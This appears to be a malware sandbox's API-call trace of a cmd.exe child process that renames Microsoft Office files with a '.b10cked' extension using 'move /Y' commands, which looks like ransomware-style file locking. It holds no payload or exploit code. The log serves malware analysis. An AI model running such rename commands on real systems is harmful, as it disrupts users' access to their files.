SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.876] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.876] GetEnvironmentStringsW () returned 0x310218* [0176.877] FreeEnvironmentStringsW (penv=0x310218) returned 1 [0176.877] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.877] GetConsoleOutputCP () returned 0x1b5 [0176.877] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.877] GetUserDefaultLCID () returned 0x409 [0176.877] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f748, cchData=128 | out: lpLCData="0") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f748, cchData=128 | out: lpLCData="0") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f748, cchData=128 | out: lpLCData="1") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.878] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: 
lpLCData=",") returned 2 [0176.878] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.879] GetConsoleTitleW (in: lpConsoleTitle=0x300938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.879] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.879] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.880] _wcsicmp (_String1="move", _String2=")") returned 68 [0176.880] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0176.880] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0176.880] _wcsicmp (_String1="IF", _String2="move") returned -4 [0176.880] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0176.880] _wcsicmp (_String1="REM", _String2="move") returned 5 [0176.880] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0176.883] GetConsoleTitleW (in: lpConsoleTitle=0x18f440, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.883] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0176.883] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0176.883] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CD") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="REN") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="SET") returned -6 [0176.884] _wcsicmp (_String1="move", 
_String2="PAUSE") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="MD") returned 11 [0176.884] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0176.884] _wcsicmp (_String1="move", _String2="RD") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0176.884] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0176.884] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0176.884] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0176.884] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="VER") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0176.884] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0176.884] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0176.884] _wcsicmp (_String1="move", _String2="START") returned -6 [0176.884] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0176.884] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0176.884] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0176.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.885] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.885] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f1fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f1f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", 
lpVolumeSerialNumber=0x18f1f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.886] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.887] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0176.887] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~2.trx")) returned 0x2020 [0176.887] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x311f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.887] SetErrorMode (uMode=0x0) returned 0x0 [0176.887] SetErrorMode (uMode=0x1) returned 0x0 [0176.887] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eb84, lpFilePart=0x18eb6c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", lpFilePart=0x18eb6c*="XLINTL~2.TRX") returned 0x3c [0176.887] 
SetErrorMode (uMode=0x0) returned 0x1 [0176.887] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2=".") returned 74 [0176.887] _wcsicmp (_String1="XLINTL~2.TRX", _String2="..") returned 74 [0176.888] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl~2.trx")) returned 0x2020 [0176.888] SetErrorMode (uMode=0x0) returned 0x0 [0176.888] SetErrorMode (uMode=0x1) returned 0x0 [0176.888] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18f000, lpFilePart=0x18ed98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", lpFilePart=0x18ed98*="XLINTL~2.TRX") returned 0x3c [0176.888] SetErrorMode (uMode=0x0) returned 0x1 [0176.888] SetErrorMode (uMode=0x0) returned 0x0 [0176.888] SetErrorMode (uMode=0x1) returned 0x0 [0176.888] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f208, lpFilePart=0x18ed98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x18ed98*="XLINTL32.REST.trx_dll.b10cked") returned 0x4d [0176.888] SetErrorMode (uMode=0x0) returned 0x1 [0176.888] SetLastError (dwErrCode=0x0) [0176.888] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0176.888] GetLastError () returned 0x2 [0176.888] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", 
fInfoLevelId=0x1, lpFindFileData=0x18e714, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e714) returned 0x312138 [0176.888] FindNextFileW (in: hFindFile=0x312138, lpFindFileData=0x18e714 | out: lpFindFileData=0x18e714) returned 0 [0176.889] GetLastError () returned 0x12 [0176.889] FindClose (in: hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0176.890] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x311cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x311cc8) returned 0x312138 [0176.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0176.890] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e9ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0176.890] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll")) returned 0x2020 [0176.890] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0176.891] FindClose (in: 
hFindFile=0x312138 | out: hFindFile=0x312138) returned 1 [0176.891] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e960 | out: _Buffer=" 1") returned 9 [0176.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.891] GetFileType (hFile=0x7) returned 0x2 [0176.976] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0176.976] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e8ec | out: lpMode=0x18e8ec) returned 1 [0176.976] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.976] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e920 | out: lpConsoleScreenBufferInfo=0x18e920) returned 1 [0176.977] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0176.977] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e960 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0176.977] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e944, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e944*=0x1a) returned 1 [0176.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.978] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0176.978] _get_osfhandle (_FileHandle=1) returned 0x7 [0176.978] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0176.978] _get_osfhandle (_FileHandle=0) returned 0x3 [0176.978] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0176.978] SetConsoleInputExeNameW () returned 0x1 [0176.978] GetConsoleOutputCP () returned 0x1b5 [0176.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.978] SetThreadUILanguage (LangId=0x0) 
returned 0x409 [0176.978] exit (_Code=0) Process: id = "316" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c00" os_pid = "0xa40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24400 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24401 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24402 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24403 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24404 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24405 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: 
"c:\\windows\\system32\\ntdll.dll") Region: id = 24406 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24407 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24408 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 24409 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24481 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24482 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24483 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24484 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 24485 start_va = 0x5d0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 24486 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24487 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 24488 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24489 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24490 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24491 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24492 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24493 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24494 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24495 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 24496 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 24497 start_va = 0x76ca0000 end_va = 0x76d6bfff 
entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 24498 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 24499 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 24500 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 24501 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 24502 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 24503 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 24504 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 425 os_tid = 0xbbc [0176.951] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fce4 | out: lpSystemTimeAsFileTime=0x24fce4*(dwLowDateTime=0x9f421da0, dwHighDateTime=0x1d440a9)) [0176.951] GetCurrentProcessId () returned 0xa40 [0176.951] GetCurrentThreadId () returned 0xbbc [0176.951] GetTickCount () returned 0x334f4 [0176.951] QueryPerformanceCounter (in: lpPerformanceCount=0x24fcdc | out: lpPerformanceCount=0x24fcdc*=23374053716) returned 1 [0176.952] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0176.952] __set_app_type (_Type=0x1) [0176.952] __p__fmode () returned 0x76b331f4 [0176.952] __p__commode () returned 0x76b331fc [0176.952] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0176.952] 
__getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0176.953] GetCurrentThreadId () returned 0xbbc [0176.953] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbbc) returned 0x38 [0176.953] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.953] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0176.953] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.953] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0176.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fc74 | out: phkResult=0x24fc74*=0x0) returned 0x2 [0176.953] VirtualQuery (in: lpAddress=0x24fcab, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fc44, dwLength=0x1c | out: lpBuffer=0x24fc44*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0176.953] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fc44, dwLength=0x1c 
